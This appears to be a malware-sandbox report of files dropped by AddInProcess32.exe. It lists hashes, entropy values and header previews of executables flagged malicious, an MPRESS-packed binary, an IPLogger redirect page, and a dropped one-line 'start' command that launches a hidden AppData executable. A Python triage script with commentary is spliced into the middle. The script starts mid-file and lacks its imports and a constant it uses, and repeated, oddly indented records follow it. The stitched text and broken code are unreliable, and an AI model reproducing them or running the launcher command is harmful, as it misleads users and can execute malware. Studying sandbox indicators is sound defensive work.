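Process:C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AddInProcess32.exe
File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Entropy (8bit):5.422209848736349
SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
Malicious:false
Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>
Process:C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AddInProcess32.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):7.146087505769809
SHA-256:CAF653628C3B248D6B9690FE887533E41C8EB03B859CB92EF6C1683D0CAB7CDB
Malicious:true
Preview:MZ......................@.......!..L.!This program cannot be run in DOS mode....PE..L...x.%d....text....rdata....data....rsrc
Process:C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AddInProcess32.exe
File Type:MS-DOS executable PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows, MZ for MS-DOS
Entropy (8bit):7.9915034437777726
SHA-256:62206E7CB02B4FE03C535AA4DAAECFA46B42DBD28A756471E50784B7622CECAF
Malicious:true
Preview:MZ@.....................................!..L.!Win64 .EXE...$@...PE..d......f....MPRESS1..........@......MPRESS2....rsrc
Process:C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AddInProcess32.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):7.146087505769809
SHA-256:CAF653628C3B248D6B9690FE887533E41C8EB03B859CB92EF6C1683D0CAB7CDB
Malicious:true
Preview:MZ......................@.......!..L.!This program cannot be run in DOS mode....PE..L...x.%d....text....rdata....data....rsrc
'''

def parse_records(text):
    """Split the flattened key:value export into one dict per dropped file."""
    records, current = [], None
    for line in text.splitlines():
        if ":" not in line:
            continue
        key, value = line.strip().split(":", 1)
        if key == "Process":  # first field of every row, so it opens a new record
            current = {}
            records.append(current)
        if current is not None:
            current[key] = value
    return records

def shannon_entropy(data):
    """Bits per byte, the measure behind 'Entropy (8bit)': 0.0 for a constant buffer, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())

def classify_preview(preview):
    """Container, architecture and packer from the preview; after 'PE..' the machine field 0x014c (i386) shows as 'L.', 0x8664 (x86-64) as 'd.'."""
    info = {"container": "unknown", "arch": None, "packer": None}
    if preview.startswith("MZ"):
        info["container"] = "pe"
        if re.search(r"PE\.\.L", preview):
            info["arch"] = "i386"
        elif re.search(r"PE\.\.d", preview):
            info["arch"] = "x86-64"
        if "MPRESS1" in preview and "MPRESS2" in preview:  # MPRESS packer section names
            info["packer"] = "MPRESS"
    elif preview.lower().startswith("<!doctype html"):
        info["container"] = "html"
    return info

def triage(records):
    """Flag packing and misplaced web pages per record; group identical payloads by SHA-256."""
    findings, by_hash = [], defaultdict(list)
    for idx, rec in enumerate(records):
        info = classify_preview(rec.get("Preview", ""))
        sha, flags = rec.get("SHA-256", "").lower(), []
        by_hash[sha].append(idx)
        if info["container"] == "html":  # a web page where a payload was expected (dead download link)
            flags.append("html-from-pe-dropper")
        if float(rec.get("Entropy (8bit)", "0")) >= PACKED_ENTROPY:
            flags.append("high-entropy")
        if info["packer"]:
            flags.append("packer:" + info["packer"])
        findings.append({"index": idx, "sha256": sha, "container": info["container"],
                         "arch": info["arch"], "flags": flags})
    return findings, {h: idxs for h, idxs in by_hash.items() if len(idxs) > 1}

def malicious_hashes(records):
    """Unique SHA-256 values the sandbox marked malicious, for a block list."""
    return sorted({r.get("SHA-256", "").lower() for r in records if r.get("Malicious") == "true"})

if __name__ == "__main__":
    recs = parse_records(SAMPLE_RECORDS)
    findings, dups = triage(recs)
    for f in findings:
        print(f"#{f['index']} {f['container']:<7} {f['arch'] or '-':<6} {f['sha256'][:16]}... {' '.join(f['flags']) or 'no flags'}")
    for sha, idxs in dups.items():
        print(f"identical payload dropped {len(idxs)} times (records {idxs}): {sha}")
    print("block list:", *malicious_hashes(recs), sep="\n  ")
```

Run stand-alone it prints one line per record, the SHA-256 that appears more than once, and the block list. The 7.9 cut-off sits below the report's own "Encrypted" heuristic (the 4405128-byte PE32 file above has entropy 7.969 and is marked Encrypted:false, while the 7.99-entropy MPRESS file is marked true), so the script will flag more files than the report does; treat "high-entropy" as a cue to unpack and re-scan, not as a verdict.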
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):473089
Entropy (8bit):7.146087505769809
Encrypted:false
SSDEEP:6144:XCcFidBDVC3puEQ482NKwo1Qdv4cGLt5hEMSIBaKqbIE4:XCcFidBDs3pGJwiQdv4cGXboEE4
MD5:CCEE6D525CB5940F123C86DB6EDD40DA
SHA1:6D17CB82E8C53E726B440CCFD0B179B70CC74FAD
SHA-256:CAF653628C3B248D6B9690FE887533E41C8EB03B859CB92EF6C1683D0CAB7CDB
SHA-512:916D3D964DC4803CBC5A1DA85BA47ABAF8F95A5609936BE5B4442CF3AE6C896B3C82A7B600DC231A4B5B958900899577F960165EE4FC722A46F6D698788FB940
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):5387648
Entropy (8bit):6.884109201607148
Encrypted:false
SSDEEP:98304:90NF76666666666666666666666666666666x666666666666666fwwwwwwwwww8:gPMki6zio75L3pf3dedO4keCIwkoYbgc
MD5:3ED2971717DB27FEA047B5E6EFCB5995
SHA1:1972C938DFC19582FD748AC9D4511FB07E6E5C51
SHA-256:AB62EB46A10B9434A8AD5302329DF1CD108F31CA5B6FE1B66431C6D503E7779D
SHA-512:27A2722C52A6C06E90B46E63A2D9960D37BEB634116F79CDF70B5D9C57D8C9D6C3B35A45A2C051463CA00BD9EA7F58244CE7FE187706070BE301CE7E998B5508
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):473089
Entropy (8bit):7.146087505769809
Encrypted:false
SSDEEP:6144:XCcFidBDVC3puEQ482NKwo1Qdv4cGLt5hEMSIBaKqbIE4:XCcFidBDs3pGJwiQdv4cGXboEE4
MD5:CCEE6D525CB5940F123C86DB6EDD40DA
SHA1:6D17CB82E8C53E726B440CCFD0B179B70CC74FAD
SHA-256:CAF653628C3B248D6B9690FE887533E41C8EB03B859CB92EF6C1683D0CAB7CDB
SHA-512:916D3D964DC4803CBC5A1DA85BA47ABAF8F95A5609936BE5B4442CF3AE6C896B3C82A7B600DC231A4B5B958900899577F960165EE4FC722A46F6D698788FB940
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:dropped
Size (bytes):7446
Entropy (8bit):5.422209848736349
Encrypted:false
SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
MD5:5B423612B36CDE7F2745455C5DD82577
SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
Malicious:false
Reputation:unknown
Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:MS-DOS executable PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows, MZ for MS-DOS
Category:dropped
Size (bytes):4407808
Entropy (8bit):7.9915034437777726
Encrypted:true
SSDEEP:98304:e58vmrQB/A24LDjFO07zDJHBSswWbdIM9F4AoP829ni+tiCCb:e5IB/A241ttEkIO4AoU2ZvnCb
MD5:3953BBAD77CDCB9D5AF2694EED7E6688
SHA1:F965B69EB36D1FBDFB7DFA8C26BA959F395B3223
SHA-256:62206E7CB02B4FE03C535AA4DAAECFA46B42DBD28A756471E50784B7622CECAF
SHA-512:94A5033EDE92683E063829C5A8F2D720C919D1320BF4DB18CC9A2E2A69387530B4AFACC73CF987695A01C09ACBA1169EEA77A0FF269B41698147CD64E64A7D38
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):4405128
Entropy (8bit):7.969340138439332
Encrypted:false
SSDEEP:98304:Ljy//HaMA0oZdbKSc0+JUZTVnoWtL+8xpWZFuo2:7pjD+c6O+8yZ12
MD5:F6C9E6F8396274E57FBA6BE593B90E36
SHA1:F520EE5C992A120ACFA2EB040CB4148F8F98C6CA
SHA-256:532B964F0E1319E50CE1BA3A20E05A4D15F822084E92BDC1E799A1D18231ACDB
SHA-512:07545E6046C18D9F32E660AAE983963032197DCDE6F7CDE3D7D8C59E8D86DD7E34D68AFCFFAFC609F9034511B08124910C9FCD2D54BA8D0E90AD1D2622D73FF2
Malicious:true
Reputation:unknown
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):7446
Entropy (8bit):5.422209848736349
Encrypted:false
SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
MD5:5B423612B36CDE7F2745455C5DD82577
SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
Malicious:false
Reputation:unknown
Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:dropped
Size (bytes):7446
Entropy (8bit):5.422209848736349
Encrypted:false
SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
MD5:5B423612B36CDE7F2745455C5DD82577
SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
Malicious:false
Reputation:unknown
Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):4405128
Entropy (8bit):7.969340138439332
Encrypted:false
SSDEEP:98304:Ljy//HaMA0oZdbKSc0+JUZTVnoWtL+8xpWZFuo2:7pjD+c6O+8yZ12
MD5:F6C9E6F8396274E57FBA6BE593B90E36
SHA1:F520EE5C992A120ACFA2EB040CB4148F8F98C6CA
SHA-256:532B964F0E1319E50CE1BA3A20E05A4D15F822084E92BDC1E799A1D18231ACDB
SHA-512:07545E6046C18D9F32E660AAE983963032197DCDE6F7CDE3D7D8C59E8D86DD7E34D68AFCFFAFC609F9034511B08124910C9FCD2D54BA8D0E90AD1D2622D73FF2
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L......e.....................N......O?............@..........................`......L.C.........................................P....................,C.................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data.............?.................@....rsrc................vA.............@..@
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):473089
                                                                                                                                                                                                                                Entropy (8bit):7.146087505769809
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:XCcFidBDVC3puEQ482NKwo1Qdv4cGLt5hEMSIBaKqbIE4:XCcFidBDs3pGJwiQdv4cGXboEE4
                                                                                                                                                                                                                                MD5:CCEE6D525CB5940F123C86DB6EDD40DA
                                                                                                                                                                                                                                SHA1:6D17CB82E8C53E726B440CCFD0B179B70CC74FAD
                                                                                                                                                                                                                                SHA-256:CAF653628C3B248D6B9690FE887533E41C8EB03B859CB92EF6C1683D0CAB7CDB
                                                                                                                                                                                                                                SHA-512:916D3D964DC4803CBC5A1DA85BA47ABAF8F95A5609936BE5B4442CF3AE6C896B3C82A7B600DC231A4B5B958900899577F960165EE4FC722A46F6D698788FB940
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L...x.%d.....................Z......O?............@..........................p..................................................P.......E...............................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data...............................@....rsrc...E...........................@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4405128
                                                                                                                                                                                                                                Entropy (8bit):7.969340138439332
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:Ljy//HaMA0oZdbKSc0+JUZTVnoWtL+8xpWZFuo2:7pjD+c6O+8yZ12
                                                                                                                                                                                                                                MD5:F6C9E6F8396274E57FBA6BE593B90E36
                                                                                                                                                                                                                                SHA1:F520EE5C992A120ACFA2EB040CB4148F8F98C6CA
                                                                                                                                                                                                                                SHA-256:532B964F0E1319E50CE1BA3A20E05A4D15F822084E92BDC1E799A1D18231ACDB
                                                                                                                                                                                                                                SHA-512:07545E6046C18D9F32E660AAE983963032197DCDE6F7CDE3D7D8C59E8D86DD7E34D68AFCFFAFC609F9034511B08124910C9FCD2D54BA8D0E90AD1D2622D73FF2
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L......e.....................N......O?............@..........................`......L.C.........................................P....................,C.................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data.............?.................@....rsrc................vA.............@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4405128
                                                                                                                                                                                                                                Entropy (8bit):7.969340138439332
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:Ljy//HaMA0oZdbKSc0+JUZTVnoWtL+8xpWZFuo2:7pjD+c6O+8yZ12
                                                                                                                                                                                                                                MD5:F6C9E6F8396274E57FBA6BE593B90E36
                                                                                                                                                                                                                                SHA1:F520EE5C992A120ACFA2EB040CB4148F8F98C6CA
                                                                                                                                                                                                                                SHA-256:532B964F0E1319E50CE1BA3A20E05A4D15F822084E92BDC1E799A1D18231ACDB
                                                                                                                                                                                                                                SHA-512:07545E6046C18D9F32E660AAE983963032197DCDE6F7CDE3D7D8C59E8D86DD7E34D68AFCFFAFC609F9034511B08124910C9FCD2D54BA8D0E90AD1D2622D73FF2
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L......e.....................N......O?............@..........................`......L.C.........................................P....................,C.................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data.............?.................@....rsrc................vA.............@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4405128
                                                                                                                                                                                                                                Entropy (8bit):7.969340138439332
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:Ljy//HaMA0oZdbKSc0+JUZTVnoWtL+8xpWZFuo2:7pjD+c6O+8yZ12
                                                                                                                                                                                                                                MD5:F6C9E6F8396274E57FBA6BE593B90E36
                                                                                                                                                                                                                                SHA1:F520EE5C992A120ACFA2EB040CB4148F8F98C6CA
                                                                                                                                                                                                                                SHA-256:532B964F0E1319E50CE1BA3A20E05A4D15F822084E92BDC1E799A1D18231ACDB
                                                                                                                                                                                                                                SHA-512:07545E6046C18D9F32E660AAE983963032197DCDE6F7CDE3D7D8C59E8D86DD7E34D68AFCFFAFC609F9034511B08124910C9FCD2D54BA8D0E90AD1D2622D73FF2
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L......e.....................N......O?............@..........................`......L.C.........................................P....................,C.................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data.............?.................@....rsrc................vA.............@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4405128
                                                                                                                                                                                                                                Entropy (8bit):7.969340138439332
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:Ljy//HaMA0oZdbKSc0+JUZTVnoWtL+8xpWZFuo2:7pjD+c6O+8yZ12
                                                                                                                                                                                                                                MD5:F6C9E6F8396274E57FBA6BE593B90E36
                                                                                                                                                                                                                                SHA1:F520EE5C992A120ACFA2EB040CB4148F8F98C6CA
                                                                                                                                                                                                                                SHA-256:532B964F0E1319E50CE1BA3A20E05A4D15F822084E92BDC1E799A1D18231ACDB
                                                                                                                                                                                                                                SHA-512:07545E6046C18D9F32E660AAE983963032197DCDE6F7CDE3D7D8C59E8D86DD7E34D68AFCFFAFC609F9034511B08124910C9FCD2D54BA8D0E90AD1D2622D73FF2
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L......e.....................N......O?............@..........................`......L.C.........................................P....................,C.................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data.............?.................@....rsrc................vA.............@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):7446
                                                                                                                                                                                                                                Entropy (8bit):5.422209848736349
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                                                                                                                                MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                                                                                                                                SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                                                                                                                                SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                                                                                                                                SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4405128
                                                                                                                                                                                                                                Entropy (8bit):7.969340138439332
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:Ljy//HaMA0oZdbKSc0+JUZTVnoWtL+8xpWZFuo2:7pjD+c6O+8yZ12
                                                                                                                                                                                                                                MD5:F6C9E6F8396274E57FBA6BE593B90E36
                                                                                                                                                                                                                                SHA1:F520EE5C992A120ACFA2EB040CB4148F8F98C6CA
                                                                                                                                                                                                                                SHA-256:532B964F0E1319E50CE1BA3A20E05A4D15F822084E92BDC1E799A1D18231ACDB
                                                                                                                                                                                                                                SHA-512:07545E6046C18D9F32E660AAE983963032197DCDE6F7CDE3D7D8C59E8D86DD7E34D68AFCFFAFC609F9034511B08124910C9FCD2D54BA8D0E90AD1D2622D73FF2
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L......e.....................N......O?............@..........................`......L.C.........................................P....................,C.................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data.............?.................@....rsrc................vA.............@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4405128
                                                                                                                                                                                                                                Entropy (8bit):7.969340138439332
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:Ljy//HaMA0oZdbKSc0+JUZTVnoWtL+8xpWZFuo2:7pjD+c6O+8yZ12
                                                                                                                                                                                                                                MD5:F6C9E6F8396274E57FBA6BE593B90E36
                                                                                                                                                                                                                                SHA1:F520EE5C992A120ACFA2EB040CB4148F8F98C6CA
                                                                                                                                                                                                                                SHA-256:532B964F0E1319E50CE1BA3A20E05A4D15F822084E92BDC1E799A1D18231ACDB
                                                                                                                                                                                                                                SHA-512:07545E6046C18D9F32E660AAE983963032197DCDE6F7CDE3D7D8C59E8D86DD7E34D68AFCFFAFC609F9034511B08124910C9FCD2D54BA8D0E90AD1D2622D73FF2
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L......e.....................N......O?............@..........................`......L.C.........................................P....................,C.................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data.............?.................@....rsrc................vA.............@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):5.026941986008737
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5MBPgnJNHFn:fE1sZ23MBWNHF
                                                                                                                                                                                                                                MD5:80CC3D014B4979C198D077188214DE7C
                                                                                                                                                                                                                                SHA1:5EB0F792C2BB313884AA06962E09F6BA94B8E395
                                                                                                                                                                                                                                SHA-256:5716AF663F6362A9E59E597FB703F2E8B4C735DB41EC2E79E9536C3592D18DA7
                                                                                                                                                                                                                                SHA-512:622BC4353436299A80144AF234F599F711E073D2AF280F9B7BD18BB06DA21620591F4DBC6D8EF99491D51C8DE8F54B8A162F96E6D2183417374833F0B465BF95
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\idw0Y68mq2UfXecINGuMfSFO.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.824417805558925
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5pQKwT8QEUK9L9JHF:fE1sZ23obK9nl
                                                                                                                                                                                                                                MD5:9EB4BDC77A2D31B8423F7C8B2705FA7F
                                                                                                                                                                                                                                SHA1:EFBBD39F70EFA82D235E655D6A04F88945926D06
                                                                                                                                                                                                                                SHA-256:057D1BD21516CF257B47B1417CC9F3C656E8939A06D6B00A1046FAC671BB1B95
                                                                                                                                                                                                                                SHA-512:55D752B32212F1662A6181AF9C10FF68B72896EDAAB165823EDA0772FF0B1CC35DC9A9964588CBBC072FCE21A185ED960BA67607C81108D8A3F622CD41D7704F
                                                                                                                                                                                                                                Malicious:true
